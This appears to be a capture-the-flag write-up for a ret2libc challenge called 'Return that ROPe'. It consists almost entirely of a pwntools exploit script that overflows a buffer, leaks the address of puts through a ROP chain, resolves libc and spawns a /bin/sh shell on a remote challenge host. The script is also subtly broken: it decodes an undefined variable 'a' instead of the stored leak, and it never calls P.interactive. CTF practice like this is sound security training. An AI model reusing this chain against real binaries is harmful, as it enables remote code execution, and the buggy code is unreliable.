Return that ROPe
ret2Lib PWN chall
Last updated
ret2Lib PWN chall
Last updated
from pwn import *
LOCAL = False
REMOTETTCP = True
host= 'challenges.ctf.cert.rcts.pt'
port=41135
LOCAL_BIN = "./rop_patched"
context.clear(arch='amd64')
LIBC = ELF("libc6_2.27-3ubuntu1.4_amd64.so")
if LOCAL:
P = process(LOCAL_BIN)
ELF_LOADED = ELF(LOCAL_BIN)
ROP_LOADED = ROP(ELF_LOADED)
elif REMOTETTCP:
P = remote(host,port)
ELF_LOADED = ELF(LOCAL_BIN)
ROP_LOADED = ROP(ELF_LOADED)
OFFSET = b'A'*40
PUTSGOT = ELF_LOADED.got['puts']
MAIN = ELF_LOADED.symbols['main']
PUTSPLT = ELF_LOADED.plt['puts']
POP_RDI = (ROP_LOADED.find_gadget(['pop rdi', 'ret']))[0]
RET = (ROP_LOADED.find_gadget(['ret']))[0]
log.info("puts@plt: " + hex(PUTSPLT) )
log.info("puts@got: " + hex(PUTSGOT))
log.info("pop rdi gadget: " + hex(POP_RDI))
#For leak Puts@got Address
payload = OFFSET
payload += p64(POP_RDI)
payload += p64(PUTSGOT)
payload += p64(PUTSPLT)
payload += p64(MAIN)
P.sendline(payload)
leakedlib=P.recvlines(4)[2]
leak = u64(a.strip().ljust(8, b'\x00'))
log.info("Leaked puts@got: %s" % hex(leak)) #With this search libc
LIBC.address = leak - LIBC.sym["puts"]
log.info("Address of libc %s " % hex(LIBC.address))
#Shell Exploit
BINSH = next(LIBC.search(b"/bin/sh"))
SYSTEM = LIBC.sym["system"]
RET = 0x0000000000401016 # RET for stack alignment.
payload = OFFSET + p64(POP_RDI) + p64(BINSH) +p64(RET)+ p64(SYSTEM)
P.sendlineafter(b'Can you ROP it?',payload)
P.interactive
